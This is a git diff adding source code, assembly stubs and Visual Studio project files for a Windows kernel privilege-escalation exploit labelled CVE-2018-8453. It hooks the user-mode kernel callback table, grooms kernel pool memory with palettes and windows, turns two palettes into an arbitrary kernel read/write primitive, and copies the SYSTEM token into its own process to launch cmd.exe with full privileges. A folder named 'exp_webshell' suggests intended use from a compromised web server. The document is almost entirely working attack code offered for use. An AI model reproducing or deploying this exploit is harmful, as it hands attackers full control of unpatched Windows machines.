+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("\n");
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel = (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮�ֳط�ˮʱ������Ķ�����������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xa0, 0x22);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+ printf("[*] Deploy Memory.\n");
+ BeforSBTrackAlloc();
+ printf("[*] SendMessage.\n");
+
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ free(lpAccel);
+ return TRUE;
+}
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj
new file mode 100644
index 0000000..418e0c9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj
@@ -0,0 +1,165 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreadedDebug
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..aafdea0
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.vcxproj.filters
@@ -0,0 +1,36 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch
new file mode 100644
index 0000000..e609501
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-12a44d53.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..4adff5a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo b/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo
new file mode 100644
index 0000000..8054913
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp.VC.db b/CVE-2018-8453/exp_x64_palette_length/exp.VC.db
new file mode 100644
index 0000000..15de77d
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_length/exp.VC.db differ
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp.sln b/CVE-2018-8453/exp_x64_palette_length/exp.sln
new file mode 100644
index 0000000..49eb848
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{34B233E1-7209-49FD-8DB8-69A9C75906D6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.ActiveCfg = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x64.Build.0 = Debug|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.ActiveCfg = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Debug|x86.Build.0 = Debug|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.ActiveCfg = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x64.Build.0 = Release|x64
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.ActiveCfg = Release|Win32
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt b/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm b/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm
new file mode 100644
index 0000000..e3a8637
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/_asm.asm
@@ -0,0 +1,36 @@
+public GetKernelCallbackTableBase
+public FuncInt3
+public SetWindowFNID
+_TEXT SEGMENT
+
+GetKernelCallbackTableBase PROC
+ ;int 3
+ mov rax,gs:[60h]
+ lea rax,[rax+58h]
+ mov rax,[rax]
+ ret
+GetKernelCallbackTableBase ENDP
+
+FuncInt3 PROC
+ int 3
+ ret
+FuncInt3 ENDP
+
+SetWindowFNID PROC
+ mov r10,rcx;
+ mov r11,rdx;
+ mov eax,1095h;
+ syscall;
+ ret;
+SetWindowFNID ENDP
+
+SetLinkedUFIs PROC
+ mov r10,rcx;
+ mov eax,12EAh;
+ syscall;
+ ret;
+SetLinkedUFIs ENDP
+
+END
+
+
diff --git a/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp b/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp
new file mode 100644
index 0000000..7e6e4b3
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_length/exp/exp.cpp
@@ -0,0 +1,437 @@
+#include "stdafx.h"
+#include
+#include
+#include
+#include
+#pragma comment(lib, "Psapi.lib")
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+HWND hReuseWND;
+
+HPALETTE hManager;
+HPALETTE hWorker;
+ULONG64 MgrAddr, WrkAddr;
+ULONG64 CurrentTagCLSAddr;
+
+CHAR SBTrackBUF[0x80];
+TCHAR MenuName[0xff0];
+HDC hDC_Writer[3000];
+ACCEL acckey[0x0D] = { 0 };
+HACCEL hAccels[1000];
+HACCEL hAccel;
+
+typedef void*(NTAPI *lHMValidateHandle)(HWND h, int type);
+lHMValidateHandle pHmValidateHandle = NULL;
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef QWORD DT;
+
+typedef struct _HEAD
+{
+ HANDLE h;
+ DWORD cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD
+{
+ HEAD h;
+ PVOID pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _THRDESKHEAD
+{
+ THROBJHEAD h;
+ PULONG64 rpdesk;
+ ULONG64 pSelf; // points to the kernel mode address
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+typedef struct
+{
+ QWORD UniqueProcessIdOffset;
+ QWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0x2e0, 0x358 };
+
+EXTERN_C PULONG64 GetKernelCallbackTableBase();
+EXTERN_C VOID FuncInt3();
+EXTERN_C VOID SetWindowFNID(HWND hWnd, LONG64 FNID);
+EXTERN_C VOID SetLinkedUFIs(HDC hDC,PULONG64 addr, LONG64 length);
+
+typedef ULONG64(WINAPI *fct_fnDispatch64)(PULONG64);
+fct_fnDispatch64 fnDWORD, fnClientFreeWindowClassExtraBytes;
+
+BOOL FindHMValidateHandle() {
+ HMODULE hUser32 = LoadLibraryA("user32.dll");
+ if (hUser32 == NULL) {
+ printf("Failed to load user32");
+ return FALSE;
+ }
+
+ BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
+ if (pIsMenu == NULL) {
+ printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
+ return FALSE;
+ }
+ unsigned int uiHMValidateHandleOffset = 0;
+ for (unsigned int i = 0; i < 0x1000; i++) {
+ BYTE* test = pIsMenu + i;
+ if (*test == 0xE8) {
+ uiHMValidateHandleOffset = i + 1;
+ break;
+ }
+ }
+ if (uiHMValidateHandleOffset == 0) {
+ printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
+ return FALSE;
+ }
+
+ unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
+ unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
+ pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
+
+ return TRUE;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x90) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+ULONG64 alloccate_free_window()
+{
+ HMODULE hInst = GetModuleHandleA(0);
+ TCHAR strclassname[32] = { 0x41 };
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = MenuName;
+ RegisterClassExW(&wnd);
+
+ HWND hTmpWnd = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hTmpWnd, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ DestroyWindow(hTmpWnd);
+ UnregisterClass(strclassname, hInst);
+ return tagCLS_lpszMenuName;
+}
+
+ULONG64 GetMangerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if ((Current == Previous) && (Current != 0))
+ {
+ hManager = CreatePaletteOfSize(0xfe8,0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+ULONG64 GetWorkerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if (Current == Previous && Current != 0)
+ {
+ hWorker = CreatePaletteOfSize(0xfe8, 0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+VOID GetMangerAndWorker() {
+
+ int i;
+ HPALETTE Padding[0x1000];
+ for (i = 0; i < 0x1000; i++) {
+ MgrAddr = GetMangerPalette();
+ WrkAddr = GetWorkerPalette();
+ if ((WrkAddr - MgrAddr) > 0x1000) {
+ Padding[i] = CreatePaletteOfSize(0x7e0, 0x41);
+ }
+ else {
+ break;
+ }
+ }
+ if (i == 0x1000) {
+ printf("Error! Cann't get Manger and Worker");
+ }
+ printf("[*] Manager: 0x%p\n[*] Worker: 0x%p\n", MgrAddr, WrkAddr);
+ for (; i > 0; i--) {
+ DeleteObject(Padding[i]);
+ }
+ memset(SBTrackBUF, 0x44, 0x80);
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = WrkAddr + 0x79 - 8;
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x79 - 8 ;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = MgrAddr + 0x16;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x16;
+}
+
+VOID ReadMem(ULONG64 Addr, DWORD len,PULONG64 ret) {
+ ULONG64 tmp = Addr;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&tmp);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)ret);
+}
+
+ULONG64 GetNTOsBase()
+{
+ ULONG64 Bases[0x1000];
+ DWORD needed = 0;
+ ULONG64 krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+ULONG64 PsInitialSystemProcess()
+{
+ ULONG64 Module = (ULONG64)LoadLibraryA("ntoskrnl.exe");
+ ULONG64 Addr = (ULONG64)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG64 res = 0;
+ ULONG64 ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 2 ,&res);
+ }
+ return res;
+}
+
+ULONG64 PsGetCurrentProcess(QWORD sysEPS)
+{
+ ULONG64 pEPROCESS = sysEPS;
+ ULONG64 Flink = 0;
+ ULONG64 PID = 0;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ while (TRUE) {
+ pEPROCESS = Flink - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 2,&PID);
+ if (GetCurrentProcessId() == PID) {
+ return pEPROCESS;
+ }
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ }
+}
+
+ULONG64 AllocSBTrackMem() {
+
+ TCHAR strMenuName[98];
+ memset(strMenuName, 0x55, 98);
+
+ TCHAR strclassname[0x32] = { 0x11 };
+ HMODULE hInst = GetModuleHandleA(0);
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = strMenuName;
+ RegisterClassExW(&wnd);
+
+ hReuseWND = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hReuseWND, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ CurrentTagCLSAddr = kernelTagCLS;
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ printf("[*] MenuName: 0x%p\n", tagCLS_lpszMenuName);
+ return tagCLS_lpszMenuName;
+}
+
+VOID SetupManger()
+{
+ QWORD buf[0x20];
+ ZeroMemory(buf, 0x20 * sizeof(QWORD));
+ GetPaletteEntries(hManager, 0x3fc, 8, (LPPALETTEENTRY)buf);
+ buf[0] = MgrAddr;
+ SetPaletteEntries(hManager, 0x3fc, 8, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, 0x20, (LPPALETTEENTRY)buf);
+ buf[3] = 0x000003d600000501;
+ buf[4] += 1;
+ buf[15] = WrkAddr + 0x78;
+ SetPaletteEntries(hWorker, 0, 0x20, (LPPALETTEENTRY)buf);
+}
+
+void GetSystem()
+{
+ ULONG64 SelfToken = 0;
+ ULONG64 SystemToken = 0;
+ ULONG64 SystemEPS;
+ ULONG64 CurrentEPS;
+ ULONG64 pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 2, &SystemToken);
+ ReadMem(CurrentEPS + gConfig.TokenOffset, 2, &SelfToken);
+
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)(CurrentEPS + gConfig.TokenOffset));
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(500);
+
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SelfToken);
+
+}
+
+void fnDWORDCallBack(PULONG64 msg)
+{
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((PULONG64)(*msg)) == (ULONG64)hMainWND)) {
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ DestroyAcceleratorTable(hAccel);
+ for (int i = 1001; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], (PULONG64)SBTrackBUF, 0xD);
+ }
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PULONG64 msg)
+{
+ if (*(PULONG64)*((PULONG64)*(msg - 11)) == (ULONG64)hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ PULONG64 CallbackTb = GetKernelCallbackTableBase();
+
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnDWORDCallBack;
+
+ CallbackTb += 124;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnClientFreeWindowClassExtraBytesCallBack;
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+
+ FindHMValidateHandle();
+ memset(MenuName, 0x41, 0xfe0);
+ MenuName[0xfe0] = 0;
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+
+ printf("[*] Deploy Memory.\n");
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+ hAccel = CreateAcceleratorTableW(acckey, 12);
+ GetMangerAndWorker();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ ULONG64 pHDCLinkData = AllocSBTrackMem();
+
+ SetupManger();
+ GetSystem();
+
+ QWORD buf[14];
+ ULONG64 zero = 0;
+ ZeroMemory(buf, 14 * sizeof(ULONG64));
+ ReadMem(pHDCLinkData, 28, buf);
+ if (buf[12] == 0x4444444400005555) {
+ CurrentTagCLSAddr += 0x98;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&CurrentTagCLSAddr);
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&zero);
+
+ DestroyWindow(hReuseWND);
+ for (int i = 0; i < 3000; i++) {
+ DeleteObject(hDC_Writer);
+ }
+ }
+ else {
+ Sleep(3600 * 1000);
+ }
+ return TRUE;
+}
+
